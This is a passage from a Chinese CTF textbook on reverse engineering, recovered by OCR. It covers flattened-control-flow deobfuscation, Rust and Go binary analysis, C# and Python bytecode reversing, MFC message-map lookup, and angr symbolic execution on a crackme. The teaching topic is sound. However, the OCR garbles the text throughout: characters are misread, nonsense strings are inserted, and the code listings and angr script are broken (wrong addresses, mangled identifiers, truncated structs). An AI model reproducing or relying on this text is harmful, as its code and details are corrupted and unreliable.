平坦 化 混 光 也 非常 简单 ， 只 需 提取 关键 的 state 变 量 ， 并 根据 分 友 器 的 分 友 规 则 进行 跟 路 ， 即 可 还 原 出 
原始 程序 的 控制 流 ， 详 细 的 实现 读者 可 以 参考 deflat.py (https://security.tencent.com/index. 

hol lole A SAN PARNE EMADLT) OIANAMAA TS EMER oT A ie 全 上 EN Po 


microcode 
-api-vs-obfuscating-compile) 开源 工具 。 


这 些 通 用 的 开源 解渴 淆 工具 能 解决 的 只 是 一 部 分 标准 的 控制 沈 平 坦 化 混淆 ， 然 而 原版 的 OLLVM 下 
年 便 已 停止 了 维护 ， 现 有 的 修改 版 OLLVM 大 多 都 是 由 个 人 维护 的 ， 并 且 一 般 会 增加 一 些 新 的 功能 ， 
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或 者 用 新 的 实现 方法 来 替代 原版 ， 比 如 : @ 增 加 假 的 state 变 量 ,或 者 将 基本 块 之 间 的 控制 流 关 系 存储 
在 其 他 地 万 ,干扰 脚本 的 分 析 ;@ 增 加 很 多 实际 不 会 执行 到 的 基本 块 加 大 分 析 难 度 ; @ 利 用 一 些 操作 
系统 的 特殊 机 制 〈 异 单 处 理 、 信 号 机 制 等 ) 来 代 蔡 主 分 友 器 。 


0; 


9， 
scanf("%d" ,&a); 


printf("%d",b); 
ret; 


图 5-5-6 
int a = 
int b = 98: printf("%d",b); 
int state = 1; ret， 


case 1 
scanf("%d",&a); if (a <= 0 ) state = 3; b=1; 
state = 2; else state = 4; state = 5; 


图 5-5-7 
考虑 到 上 述 原因 ， 在 实际 的 逆向 过 程 中 ， 我 们 不 能 每 次 都 指望 使 用 采 类 通用 的 解 混淆 脚本 来 还 原 程序 
逻辑 。 较 好 的 方法 是 对 一 些 关键 数据 (如 输入 的 flag) 内 存 读 取 / 写 入 设置 断 点 ， 进 而 定位 到 程序 中 对 
天 键 数据 进行 操作 的 逻辑 ， 或 者 使 用 trace 类 的 工具 提取 出 程序 真实 执行 过 的 基本 块 ， 表 着 重 分 析 这 些 
1 A A 


的 程序 逻辑 ， 完 成 解 题 。 
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5.6 高 级 语言 逆 同 

在 CTF 比 赛 中 会 有 一 些 其 他 高 级 语言 逆向 题 ， 如 Rust、Python、Go、C# 等 ， 有 时 还 会 涉及 一 些 特定 
EE bE C0 
言 ，Python、C# 等 是 基于 虚拟 机 的 高 级 语言 。 本 节 分 别 讲述 其 分 析 思 路 ， 并 讲解 C++MFC 程 序 分 析 
的 一 般 方 法 。 


5.6.1 Rust 和 Go 


本 节 将 以 Insomni'hack teaser 2019 的 beginner reverse 为 例 讲解 Rust 程 序 的 分 析 方 法 。 该 程序 用 
载 入 后 ( 见 图 5-6-1) ， 左 窗 格 中 有 一 些 奇怪 的 函数 名 ， 右 窗 格 中 有 形 如 std:rtdang start 
: : 这 样 的 字符 串 ， 可 以 猜测 这 也 许 是 由 某 种 高 级 语言 编写 的 程序 。 互 联网 检索 该 字符 串 ， 得 到 一 
些 与 Rust 语 言 有 关 的 信息 ， 进 而 可 以 推断 这 是 个 Rust 程 序 。 当 然 ， 这 是 在 有 符号 情况 下 的 分 析 ， 在 无 
符号 情况 下 ， 可 以 在 IDA 中 搜索 诸如 main.rs 的 Rust 字 符 串 ， 也 能 推断 程序 是 否 为 Rust 程 序 。 


ed 
roe near 


判断 出 程序 编写 语言 后 ， 为 了 方便 分 析 ， 可 以 借助 一 些 工 具 来 优化 IDA 对 程序 的 分 析 。Rust 目 前 公开 
的 脚本 工具 有 rust-reversing-helper ( 发 布 在 GitHub 上 ) ， 使 用 教程 可 参考 https://kongre 
/? p=71。 该 工具 实现 了 5 个 功能 ， 其 中 釜 名 加 载 是 最 重要 的 ， 能 优化 识别 Rust 函 数 ， 从 而 减少 分 析 
时 间 。 


rust-reversing-helper 优 化 后 的 结果 见 图 5-6-2。 可 以 看 到 ， 左 侧 Function name 中 的 函数 名 已 经 被 


优化 ， 我 们 可 以 开始 着 手 分 析 了 。 按 照 一 般 的 分 析 经 验 ， 我 们 往往 会 分 析 std_rt_lang start 
EE PN = NE _start_internal 是 Rust 的 初始 化 函数 ， 其 功 能 如 同 
国 数 ， 而 在 call std_rt_lang_start internal 上 方 可 以 发 现 beginer_reverse main 函 数 ， 因 此 在 
中 ， 主 函数 是 被 当 作 初始 化 函数 参数 ， 在 程序 初始 化 完成 后 加 载 执 行 的 ， 这 也 是 Rus 刻 序 的 一 个 


继续 分 析 beginer_reverse_main， 见 图 5-6-3。 该 水 数 逻辑 比较 直观 ， 程 序 在 加 载 某 些 数据 后 ， 便 
开始 读 取 输入 ， 不 过 输入 数据 存放 的 位 置 却 不 得 而 知 。 由 此 看 来 ,虽然 有 脚本 工具 的 优化 ， 但 想 完 完 
整整 地 对 程序 流程 进行 还 原 依 旧 比较 困难 。 这 里 需要 手工 修正 一 些 识别 的 错误 ， 如 read line() 函 数 没 
有 传 参 ， 其 返回 值 也 没有 赋值 操作 ， 这 显然 是 不 可 能 的 。 修 正 的 方法 很 多 ， 如 采取 动态 调试 ， 在 read 
line0 处 下 断 点 ， 观 察 堆 栈 的 情况 ， 或 者 分 析 read line() 函 数 内 部 来 判断 该 函数 会 有 几 个 参数 ， 也 可 
以 查询 资料 来 修正 。 


pw 
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nt6 v368} 
rust alloc(); 
if ( ivo ) 
alloc::alloc: :handle alloc error(); 
RD *)vO = xmmword 51000; 
*)(VO + 16) = Xmmword | 51010; 


std: io iorrstaio: :stdin(); 

v27 = 

std: ed ili :Stdin: :read line(); 
if ( v35 == (void **)&bitselim ) 


{ 
V30 = v36} 
Core: :result: :unwrap failed(aErrorReadingIn, 19LL, &v30); 


if ( !_InterlockedSub64(v27, luLL) ) 
_alloc::sync::Arc T __::drop_slow(&v27], &v27); 
oo 


*)&v29 + 1)? 
if ( “CC onD *)&v29 + 1) ) 


Va = *((_ QWORD *)&v29 + 1) +v 
v5 = se BYTE *)(*((_ QWORD Ry + 1) + v28 - 1)}; 
v6 = 

( >=0) 


124 7 
= *#((_QWO *)&v29 + = 恨 - v6} 
op QWORD “ev2 + 1) = 
Va = v3 + v28; 
goto Za 23! 


if ( v28 == v4 - 1) 
vi0 = 0; 


S56-3 
目前 ,我们 对 Rust 已 经 有 了 很 好 的 分 析 思 路 ， 后 续 分 析 可 以 采取 常规 的 静态 、 动 态 分 析 方 法 来 解决 ， 
这 里 不 再 鳌 述 。 


下 面 以 INCTF2018 的 ultimateGo 为 例 介绍 Go 语言 的 逆向 ， 程 序 用 IDA 载 入 后 ，start 函 数 见 图 5-6- 
4。 观 察 start 国 数 ， 可 以 发 现 这 与 一 般 的 ELF 程 序 的 start 函 数 有 了 明显 区 别 ， 猜 测 该 程序 可 能 不 是 C/C+ 
+ 系列 的 弟 规 编译 器 编译 的 。 执 行 strings 命 令 ， 输 出 该 程序 包含 的 可 见 字符 串 ， 很 快 发 现 一 些 带 有 “. 
go” 的 字符 串 ( 见 图 ?5-6-5) ， 即 可 推断 其 编写 语言 是 Go 语言 。 


同样 ， 为 了 方便 分 析 ， 可 以 借助 Golang 的 优化 分 析 脚 本 工具 ， Github 上 有 golang loader assist 和 | 
工具 。 使 用 IDAGolangHelper 恢 复 函 数 名 ， 见 图 5-6-6。 


可 以 看 到 ， 左 侧 窗 体 中 的 函数 名 已 经 恢复 ， 并 且 右 侧 可 以 看 见 main 函 数 。 与 Rust 一 样 ，Go 主 函数 会 
作为 参数 ， 在 初始 化 完成 后 被 执行 ( 见 图 5-6-7) ， 这 里 的 off 54A470 其 实 是 runtime main。 分 析 
runtime_main 发 现 了 main_main 函 数 ( 见 图 5-6-8) 。 至 此 ，Go 的 主 函数 定位 完成 ， 之 后 便 可 开始 
EE 


rsi, [rsptarg 0] 
rdi, [zsp+ 目 ] 
rax loc 458420 


USr/Local had src/net/dnsclient.go 
src/net/unixsock.go 
ry 
‘src/net/parse.go 
OA gqO 
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runtime check(v15，a3，(_ int64)v3，v9，v1 
runtime args((_ int64)v3, v9, v1i8, v1i9, v2 


runtime newproc((char)v3, v9, v22, v23, v2 
result = runtime mstart(( int64)v3, v9); 


ockOSThread(al 
要 Te 5FD303 && 本 5FD304 ) 


main main(al, a2, (_ int64)off 53BAAO0); 
if ( dword 5FD360 ) 


{ 
for (i= 0LL; i < 1000; i = v27 + 1 ) 


v1l9 = (unsigned int)dword 5FD360; 
if ( !dword 5FD360 ) 


图 5-6-8 
注意 ， 以 runtime 、fmt 等 前 缀 是 go 程序 包 名 的 国 数 ， 可 以 从 函数 名 上 去 理解 其 作用 ， 而 以 main 为 
前 缀 的 国 数 ， 基 本 上 是 程序 编写 者 自己 编写 的 函数 ， 是 需要 去 细致 分 析 的 ， 后 续 的 分 析 可 以 采用 正常 
的 分 析 方 法 ， 在 前 文 均 已 叙述 。 


总 而 言 之 ,无 论 是 Rust 还 是 Golang， 这 类 无 虚拟 机 的 高 级 语言 程序 都 可 以 被 当 作 抽 象 层次 较 高 、 包 
合 一 些 额 外 操作 的 5 程序 来 对 待 ， 面 对 一 个 这 样 的 程序 ， 往 往 应 当先 寻找 其 特征 ， 如 字符 串 、 函 数 
名 、 符 号 变量 、 魔 数 等 ， 从 而 判断 其 所 属 语言 ， 这 样 才能 知道 应 该 采取 何 种 修正 方法 ， 修 正 完 后 ， 则 
可 将 其 当 作 C 程 序 来 分 析 了 。 


5.6.2 C# 和 Python 


C# 、Python 是 基于 虚拟 机 的 高 级 语言 ， 其 可 执行 程序 或 文件 中 包含 的 字 节 码 ， 并 不 是 传统 汇编 指令 
的 机 器 码 ， 而 是 其 本 身 虚拟 机 指令 的 字 节 码 ， 所 以 这 类 程序 或 文件 不 宜 使 用 DA 分析， 应 借助 其 它 分 
析 工 具 。 


C# 的 逆向 分 析 工 具有 .NET Reflector、ILSpy/dnSpy、Telerik JustDecompile、JetBrains dotPeek 
等 ， 分 析 C# 程序 ， 只 需 用 这 些 工 具 打 开 即 可 得 到 源码 。 当 然 ， 这 是 C# 程序 没有 被 保护 的 情况 下 ， 对 
于 有 保护 (有 碗 ) 的 C# 程序， 则 需 先 去 帝 再 分 析 。 去 壳 工 具 可 以 用 de4dot。 由 于 C# 在 比赛 中 并 不 
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时 由 ， 辽 旦 哆 个 以 亿 于 朵 册 三 [EEE 


在 CTF 比 赛 中 ，Python 的 逆向 往往 是 对 其 PYC 文 件 的 逆向 分 析 。PYC 文 件 是 PY 文件 编译 后 生成 的 字 节 
码 文 件 ， 对 于 一 些 没有 混淆 过 的 PYC 文 件 ， 利 用 Python 的 uncompyle2 可 将 其 还 原 成 PY 文 件 ， 而 对 
于 混 消 过 的 PYC 文 件 ， 若 无 法 去 混淆 ， 则 只 能 分 析 其 虚拟 机 指令 。 


这 里 以 Python 2.7 为 例 ， 在 对 其 虚拟 机 指令 进行 分 析 前 ， 需 要 先 了 解 的 是 Python 的 PyCodeObject 对 
象 ， 其 定义 节选 如 下 : 


/* Bytecode object */ 
typedef struct { 
PyObject_HEAD 
int co_argcount; /* #arguments, except x*args */ 
int co_kwonlyargcount; /* #keyword only arguments */ 
int co_nlocals; /* #local variables */ 
int co_stacksize; /* #entries needed for evaluation stack */ 
/* CO_..., see below */ 
/* instruction opcodes */ 
/* list (constants used) */ 
/* list of strings (names used) */ 
PyObject *co_varnames; /* tuple of strings (local variable names) */ 
PyObject *co_freevars; /* tuple of strings (free variable names) */ 
PyObject *co_cellvars; /* tuple of strings (cell variable names) */ 
/* The rest doesn't count for hash or comparisons */ 
unsigned char *co_cell2arg; /* Maps cell vars which are arguments. */ 
PyObject *co_filename; /* unicode (where it was loaded from) */ 


说 明 如 下 。 
叙 CO_nlocals: Code Block 中 局 部 变量 个 数 ， 包 括 其 位 置 参 数 个 数 。 


作 CO stacksize: 执行 该 段 Code Block 需 要 的 栈 空间 。 


ko eole (PM Code Block 编 译 得 到 的 字 节 码 指令 序列 ， 以 PystringObject 的 形式 人 存在 。 


学 co _consts: PyTupleObject， 保 仔 Code Block 中 的 所 有 音量 。 

学 CO_names: PyTupleObject, 保存 Code Block 中 的 所 有 符号 。 

必 CcO varnames: Code Block 中 的 局 部 变量 名 集合 。 

学 co freevars: Python 实 现 闭 包 存储 内 容 。 

党 coO_cellvars: Code Block 中 内 部 谋 套 消 数 所 引用 的 局 部 变量 名 集合 。 
学 co filename: Code Block 对 应 的 .py 文件 的 完整 路 径 。 

学 co name: Code Block 的 名 字 ， 通 常 是 国 数 名 或 类 名 。 


PyCodeObject 是 Python 中 的 一 个 命名 空间 (命名 空间 指 的 是 有 独立 变量 定义 的 代码 块 ， 如 函数 、 
类 、 模 块 等 ) 的 编译 结果 在 内 存 中 的 表示 。 从 源码 可 以 看 出 ，PyCodeObject 包 含 一 些 重要 字段 。 对 
于 一 个 PYC 文 件 ， 除 去 开头 的 8 字 节 数据 (版 本 号 和 修改 时 间 ) ， 剩 下 的 是 一 个 大 的 PyCodeObject。 
在 Python 中 执行 以 下 命令 ， 将 读 取 的 二 进 制 数据 反 序 列 化 成 PyCodeObject: 


import marshal 
code = marshal.loads(data) 


这 里 ，code 是 PYC 文 件 的 PyCodeObject， 由 于 PYC 的 混淆 往往 出 现在 PyCodeObject 的 co_code 字 
段 中 ， 便 需要 对 co_code 字 段 的 数据 进行 提取 并 去 混淆 。 这 里 的 混淆 与 传统 汇编 揭 令 的 混 清 近似 ， 所 
以 去 混淆 的 方法 与 传统 汇编 指令 的 去 混 清 方法 基本 相同 ， 因 此 不 再 更 还 。 注 晶 ，PyCodeObject 的 字 
段 中 也 有 可 能 和 仓 在 混淆 过 的 PyCodeObject， 所 以 需要 对 其 每 个 可 志 历 字段 进行 笛 历 ， 以 免 出 现 丝 
漏 。PYC 去 混淆 后 ， 我 们 便 可 以 尝试 使 用 uncompyle2 对 其 进行 有 反 编译 了 。 


如 果 去 混淆 比较 困难 ， 只 能 分 析 其 虚拟 机 指令 ， 则 需要 根据 Python 对 应 版 本 的 字 节 人 码 表 ， 目 己 来 实现 
对 其 字 证 码 的 反 汇编 ， 以 达到 分 析 的 目的 。 
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56.3C++MFC 


MFC 是 微软 开发 的 一 套 C++ 类 库 ， 用 来 支撑 Windows 下 部 分 GUI 程序 的 运行 。MFC 包 装 了 Windows 
GUI 烦琐 的 消息 循环 、 消 息 处 理 流 程 ， 将 消息 用 C++ 的 类 封装 ， 然 后 分 发 到 绑 定 的 对 象 上 ， 方 便 开 发 
人 员 快 速 编写 程序 。 正 是 由 于 MFC 的 多 层 封 效 ， 逆 向 者 会 友 现 ， 大 量 的 消息 处 理 函 数 并 没有 直接 的 代 
码 引 用 ， 而 是 被 间接 调用 ， 这 给 逆向 者 带 来 了 很 大 的 麻烦 。 


当然 ， 出 现 问题 目 然 会 有 相应 的 解决 万 法 。 Ma Dee ea al SE 
_MSGMAP ENTRY， 其 结构 如 下 : 


struct AFX_MSGMAP { 
const AFX_MSGMAP* (PASCAL* pfnGetBaseMap)(); 
const AFX_MSGMAP_ENTRY* LpEntries; 
struct AFX_MSGMAP_ENTRY { 
UINT nMessage; 
UINT nCode; 
UINT nID; 
UINT nLastID; 
UINT_PTR nSig; 
AFX_PMSG pfn; 


只 要 找到 MessageMap， 融 可 以 找到 所 有 的 消息 处 理 尔 数 ， 待 找到 消息 处 理 阔 数 后 ， 即 可 使 用 一 般 的 
逆向 分 析 拉 巧 进行 分 析 。 下 面 介绍 两 种 找到 MessageMap 的 万 案 。 


1. 利用 CWnd 的 类 和 实例 方法 ， 动 态 获取 目标 窗口 的 MessageMap 信 息 


使 用 xspy 工 具 ， 将 代码 拖 动 到 对 应 窗口 和 按钮 上 ， 即 可 自动 解析 出 相关 的 消息 处 理 函 数 。 查 看 xspy 
的 源码 可 各，xspy 的 内 部 原理 是 将 一 个 DLL 注入 进程 序 ， 然 后 在 注入 的 DLL 中 Hook 窗 口 的 ， 
ndProc 
， 从 而 获取 到 程序 UlI 线 程 的 执行 权限 。 在 MFC 的 代码 中 ， 利 用 硬 编码 的 已 有 模式 搜索 CWnd: : 
FromHandlePermanent 
的 地 址 ， 搜 索 到 残 可 以 利用 这 个 函数 将 获取 到 的 hWnd 转 为 CWnd 类 的 实例 。 转 
为 CWnd 的 实例 后 就 可 以 调用 CWnd 的 各 种 方法 ， 如 GetMessageMap 等 。 


图 5-6-9 为 一 个 普通 MFC 程 序 可 获取 到 的 信息 ，OnCommand 一 般 为 按钮 和 菜单 被 触发 时 产生 的 消 
息 ， 其 中 的 id= 3ed 等 可 通过 ResHacker 或 者 xspy 自 身 查 看 。 


mm ai | 网 [CE 


[vtbl +0x0F ]GetConnecti ornMap = 0x00740C75 ->》0x007CFB40(EvolDecrvypterGui. exe+ 0x41 和 
vtbl +0x10]GetInterfacellap = Ox007582D5 -> Ox007BS5C?0 (EvolDecrypterGui. exe+ Dx40! 
vtbl+0x11 JGetEventSinlMap = 0x00749014 —> OxOO7?CFBAD (EvolDecrypterGuil. exe+ Dx41 
vtbl +0x12]0nCreateAgeregates = 0x0073BF9F —> Ox007D0220(EvolDecrypterGui. exe+ Dx42I 
vtbl+0x13|]GetInterfacelHook = Ox0073F131 -> Ox007CFBEO (EvolDecrypterGui. exe+ Oxd1 
vtbl +0x14]GetExtraConnectionFoints= Dx007486F5 —> ee exe+ Dx4l 
vtbl+0x15]GetConnecti onHook = 0x0073FI98 -> Dx007CFB20 (EvolDecrypterGui. exe+ Ox41 


pro 


message map=0x00E919A0(EvolDecrypterGui. exe+ 0xael9a0 ) 

msg map entries at 0x00F918F0(EvolDecrypterGui. exe+ 0xael8e0 ) 

Orlfszg:WL_SYSCOMLANDDO112), func= 0x00747289 ->》0x00778510(EvolDecrvpterGui. exe+ 0x3c8510 
OrnMse: WH_PAINT (000£), func= Ox00745E55 —> Ox00778570(EvolDecrypterGui. exe+ 0x3c8570 ) 
OrMse: WH QUERYDRAGICONCO0037), func= Ox007415DF —> Ox00778780 (EvolDe terGul. exe+ Dx3c87' 
0nCommand: notifycode=0300 id=03ed, func= 0x00746990 -> Ox007787C0 (Evol DeorypterGui. exe+ | 
Dntommand: notifycode=0000 id=03ee, func= 0x0073A2F3 —> Dx0O7ATC60 (EvolDecrypterGui. exe+ | 
OnCommand: notifycode=0000 1d=03ef, func= Ox00758ACD -> tee he ph exe+ | 
OnCommand: notifycode=0000 1d=03ea, func= 0x00758B4A —> Dx00778980 (EvolDecrypterGui. exe+ | 


< E> 


图 5=6=9 








2. 在 IDA 中 利用 引用 关系 寻找 


在 IDA 中 寻找 CDialog 字 符 串 ， 然 后 寻找 对 CDialog 字 符 串 的 交叉 引用 ， 全 
。 也 可 以 使 用 IDA 搜 索 常 量 的 功能 ， 搜 索 按 钮 的 资源 id， 从 而 找到 AFX_MSGMAP_ENTRY。 但 
是 由 于 MFC 程 序 一 般 较 大 ， 完 整 分 析 耗 时 较 久 ， 使 用 xspy 工 具 快 速 且 有 针对 性 地 定位 明显 是 更 好 的 选 


择 。 


SGMAP 
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5.7 现代 逆向 工程 扩 巧 


随 着 高 级 语言 和 开发 工具 链 的 发 展 ， 软 件 开发 效率 不 断 提 高 ， 二 进 制程 序 的 复杂 度 越 来 越 高 。 对 于 现 
代 的 逆向 工程 ， 纯 人 工分 析 的 效率 明显 偏 低 ， 所 以 需要 一 些 上 自动 化 的 分 析 方 法 进行 辅助 。 


本 节 将 介绍 两 种 常见 的 现代 逆向 工程 技巧 一 一 符号 执行 和 二 进 制 插 桩 ， 并 辅 以 相关 实例 ， 读 者 在 阅读 
后 可 以 车 握 现 代 逆 向 工程 的 一 些 基 本 操作 。 


5.7.1 符号 执行 


5.7.1.1 符号 执行 概述 


符号 执行 (Symbolic Execution) 是 一 种 程序 分 析 技 术 ， 可 以 通过 分 析 程 序 来 得 到 让 特定 代码 区 域 
执行 的 输入 。 使 用 符号 执行 分 析 一 个 程序 时 ， 该 程序 会 使 用 符号 值 作为 输入 ， 而 非 一 般 执行 程序 时 使 
用 的 具体 值 。 在 达到 目标 代码 时 ， 分 析 器 可 以 得 到 相应 的 路 径 约束 ， 然 后 通过 约束 求解 器 来 得 到 可 以 
触发 目标 代码 的 具体 值 。 在 实际 环境 下 ， 符 号 执行 被 广泛 运用 到 了 自动 化 漏洞 挖掘 测试 的 过 程 中 。 在 
CTF 中 ， 符 号 执行 很 适合 解决 各 种 逆向 题 ， 只 需 让 符号 执行 引擎 自动 分 析 ， 找到 让 程序 执行 到 输出 ， 
正确 的 位 置 ， 然 后 求解 出 所 需 的 输入 即 可 。 例 如 : 


Z = V2 
EN 三 

brinef Crignen 
se 


el 
printf("wrong"); 


容易 分 析 ， 当 read int 处 输入 为 6 时 ， 程 序 会 输出 right。 符 号 执行 引擎 则 会 将 y 作 为 一 个 未 知 数 ， 在 
符号 引擎 运行 的 过 程 中 会 记录 这 个 未 知 数 进行 的 运算 ， 最 后 得 出 程序 到 达 输 出 正确 的 地 点 的 前 置 条 件 
为 y*2==12， 进 而 通过 这 个 表达 式 解 出 满足 条 件 的 输入 。 


5.7.1.2 angr 
符号 执行 已 经 有 很 多 现成 的 工具 可 以 使 用 ， 见 表 5-7-1。 


表 5-7-1 


适用 范围 
X86, x86-64, ARM, AARCH64, MIPS, MIPS64, PPC, PPC64 
x86，x86-64，ARM 架构 下 用 户 态 与 内 核 态 程序 


= le DE ， 非 钟 适 合 在 CTF 中 解决 多 数 工 具 文 持 较 差 的 不 常见 架 
构 的 逆向 题 。 作 为 一 个 开源 项 目 ，angr 的 开发 效率 也 非常 高 ， 虽 然 运 行 速度 较 慢 ， 但 是 合理 地 使 用 它 
能 够 辅助 选手 更 快 更 方便 地 解决 部 分 CTF 中 的 逆向 题 。 


注意 ，angIr 项 目 仍然 处 于 活跃 状态 ， 它 的 API 在 过 去 的 几 年 中 变化 得 非常 快 ， 很 多 以 前 的 脚本 可 能 
经 无 法 运行 ， 所 以 不 能 保证 本 书 中 的 示例 代码 能 够 在 最 新 版 本 的 angr 上 运行 。 


angr 安 装 简 单 ， 支 持 折 有 主流 平台 (Windows、Mac、Linux) ， 只 需 pip install angr 命 令 即 可 完 
成 安装 。 但 是 因为 angr 本 身 对 z3 进 行 了 一 些 改动 ， 所 以 官方 推荐 将 其 安装 在 虚拟 环境 中 。 


目前 ， 最 新 版 的 angr 主 要 分 为 5 个 模块 : 主 分 析 器 angr、 约 束 求解 器 claripy、 二 进 制 文 件 加 载 器 

全 
、 汇 编 翻 译 器 pyvex (用 于 将 二 进 制 代码 翻译 为 统一 的 中 间 语 言 ) 、 架 构 信 息 库 archinfo (存放 很 多 
架构 相关 的 信息 ， 用 于 针对 性 地 处 理 不 同 的 架构 ) 。 
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angr 的 API 比 较 复 杂 ， 本 节 结 合 一 些 题 目 进行 讲解 ， 以 便 读 者 更 好 地 理解 其 使 用 方法 。 
1. defcamp r100 


defcamp r100 程 序 本 身 比较 简单 ， 主 要 逻辑 是 从 输入 中 读 取 一 个 字符 串 ， 然 后 进入 sub 4006FD 轩 
数 进 行 验证 ， 见 图 5-7-1。 在 函数 sub 4006FD 中 ， 程 序 也 只 进行 了 一 个 简单 的 验证 ， 见 图 5-7-2。 


首先 来 看 官方 给 的 示例 代码 : 


signed int64 result; // rax 
char s; // [rsp+eh] [rbp-118h| 
unsigned int64 v5; // [rsp+188h] [rbp-8h] 


v5 = _ readfsqword(@x28u); 
printf("Enter the password: ", a2, a3); 
if ( !fgets(&s, 255, stdin) ) 
return 8LL; 
if ( (unsigned int)sub 4006FD(( int64)&s) ) 


puts("Incorrect password!"); 
result = 1LL; 


} 


else 


puts("Nice!™"); 
result = QLL; 
} 


return result; 


signed int64 fastcall sub A4886FD(char *al) 


{ 
signed int i; // [rsp+14h| [rbp-24h | 


_QWORD v3[4]; // [rsp+1i8h] [rbp-28h| 


v3[8] = "Dufhbmf™"; 

v3[1] = "pG imos"; 

v3[2] = "ewUglpt"; 

for (i= 0; i <= 11; + ) 

{ 

if ( *(char *)(v3[i % 3 +2* (i / 3)) - allil 
return 1LL; 
} 


return QO@LL; 


import angr 
def main(): 
p = angr.Project("r100") 
simgr = p.factory.simulation_manager(p.factory.full_init_state()) 
simgr.expLore(find=9x499844，avoid=0x499855) 
return simgr.found[69].posix.dumps(9).strip(b'No\n'D) 


def test(): 
assert main().startswith(b'Code_Talkers') 


if __name__ = 


rint(main()) 


首先 angr.Project 载 入 了 需要 分 析 的 程序 ， 然 后 程序 使 用 p.factory.simulation manager 创 建 了 一 个 
S 
_manager 进 行 模拟 执行 ， 其 中 传 入 了 一 个 SimState 作 为 初始 状态 。SimState 代 表 了 程序 

的 一 种 状态 ， 状 态 中 包含 了 程序 的 寄存 器 、 内 存 、 执 行路 径 等 信息 。 创 建 时 通常 使 用 如 下 3 种 : 


从 blank_state (**kwargs) : 返回 一 个 未 初始 化 的 state， 此 时 需要 手动 设置 入 口 地 址 ， 以 
及 自 定 义 的 参数 。 


4 entry state (**kwargs) : 返回 程序 入 口 地 址 的 state， 默 认 会 使 用 该 状态 。 
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学 Tull InIt state Wargs) : 同 entry state ETTE 由 住 坝 行 


口 点 前 应 调用 每 个 库 的 初始 化 函数 。 


在 设置 好 状态 后 ， 我 们 需要 让 angr 按 照 我 们 的 要 求 执行 到 目标 位 置 。 本 题 的 目标 是 让 程序 输出 字符 
串 "Nice"， 对 应 的 地 址 为 0x400844， 所 以 需要 在 find 人 参数 中 填 入 这 个 地 址 ， 引 警 在 执行 到 相应 地 址 
后 ， 就 会 认为 执行 成 功 而 返回 结果 。 而 输出 "Incorrect password! “对 应 的 地 址 0x400855 显 然 是 需 
要 规避 的 ， 所 以 需要 在 avoid 参 数 中 标明 这 个 地 址 ， 让 符号 执行 引擎 在 执行 到 该 地 址 时 忽略 这 个 路 径 
不 再 进行 计算 。 这 样 ， 我 们 可 以 使 用 explore 方 法 寻找 能 够 到 达 目 标 位 置 的 路 径 。 ( 注 : find 和 avoid 
参数 均 可 以 传 入 数组 作为 参数 ， 如 find=[0xaaa ，0Oxbbb]，avoid=[0xccc，0xddd]。 ) 


当 explore 方 法 返回 时 ， 可 以 通过 found 成 员 获取 符号 执行 引擎 找到 的 路 径 。found 成 员 其 实 是 一 个 
表 ， 其 中 存储 着 所 有 找到 的 路 径 。 当 然 ，found 表 也 有 可 能 为 空 ， 说 明 angr 无 法 找到 一 条 通 往 目标 地 
址 的 路 径 ， 这 时 应 该 检查 脚本 是 否 有 问题 。 


在 示例 代码 中 ， 我 们 通过 simgr.found[0] 获 取 到 了 一 条 能 够 到 达 目 标 地 点 的 路 径 ， 这 时 返回 的 数据 类 
型 为 Simstate， 代 表 程 序 此 时 的 一 个 状态 。 这 个 变量 可 以 获取 程序 此 时 的 所 有 状态 ， 包 括 寄存 器 (如 
simgr.found[0].regs.rax) 、 内 存 (如 simgr.found[0].mem[0x400610].byte) 等 。 不 过 ， 我 
们 最 关心 的 是 让 程序 执行 到 这 个 地 点 时 的 输入 。 由 图 5-7-1 可 以 看 出 ， 这 个 程序 是 从 标准 输入 中 获取 
的 用 尸 输 入 的 ， 因 此 我 们 目 然 也 应 该 从 标准 输入 中 获取 输入 的 内 容 。 而 SimState 中 的 posix 代 表 了 程 
序 通 过 POSIX (Portable Operating System Interface) 规范 中 的 接口 获取 的 数据 ， 包 括 环 境 变 
量 、 命 令 行 参数 、 标 准 输 入 、 输 出 的 数据 等 。 通 过 POSIX 获 取 标 准 输 入 的 数据 非常 容易 ， 通过 posix ， 
(0) 方法 即 可 获取 标准 输入 POSIX 规定 标准 输入 的 文件 句柄 号 为 0) 中 的 数据 。 同 理 ， 使 用 
dumps (1) 可 以 看 到 标准 输出 POSIX 规 定 标准 输出 的 文件 句柄 号 为 1) 的 内 容 ， 此 时 程序 的 

渝 出 应 该 只 有 字符 串 "Enter the password: “。 


在 了 解 了 基本 的 使 用 方法 以 后 ， 我 们 可 以 对 这 一 段 示例 代码 做 出 一 些 改进 。 


首先 ， 在 载 入 需要 分 析 的 程序 的 过 程 中 ， 可 以 通过 添加 auto _ load libs 阻 止 angr 自 动 载 入 并 分 析 依 赖 
的 库 函 数 : 


p = angr.Project("r100" ,auto_Load_Libs=FaLse) 


如 果 auto load libs 设 置 为 True (默认 为 True) ， 那 么 angr 会 自动 载 入 依赖 的 库 ， 然 后 分 析 到 库 函 数 
调用 时 也 会 进入 库 函 数 ， 这 样 会 增加 分 析 的 工作 量 。 如 果 为 False， 那 么 程序 调用 函数 时 会 直接 返回 一 
个 不 受 约 束 的 符号 值 。 本 例 由 于 程序 完全 使 用 的 是 libc 中 的 函数 ，angr 已 经 为 其 做 了 专门 的 优化 ， 不 
需 再 加 载 libc 库 。 


然后 可 以 指定 让 程序 从 main 函 数 开 始 运行 ， 进 而 避免 angr 反 复 执行 程序 中 的 初始 化 操作 ， 这 些 操作 
是 非常 耗 时 的 ， 并 且 对 本 题 中 核心 的 验证 算法 没有 影响 。 这 时 我 们 就 可 以 不 使 用 entry_state， 而 使 用 
可 以 方便 我 们 手动 指定 开始 地 址 的 blank_state， 在 参数 中 指定 main 函 数 的 地 址 0x4007E8: 


state = p.factory.blank_state(addr = 0x4007E8) 


但 是 没有 库 阔 数 后 要 怎样 表示 printf 和 scanf 这 种 尔 数 呢 ? angr 提 供 了 Hooki 文 些 库 函数 的 接口 ， 从 而 
实现 它们 对 应 的 功能 。 


printf 函 数 对 程序 的 分 析 不 会 造成 任何 影响 ， 所 以 在 此 可 以 直接 让 它 返回 。angr 中 有 许多 预先 实现 的 
库 函 数 ， 在 angYVprocedures 目 录 中 可 以 看 到 ， 我 们 让 函数 返回 [stubs'] [ReturnUnconstrained ]。 


p.hook_symbol('printf', angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'](), replace=True) 


其 中 ，replace=True 代 表 了 车 代 之 前 的 Hook， 因 为 angr 的 SIM PROCEDURES 中 已 经 实现 了 libc 的 
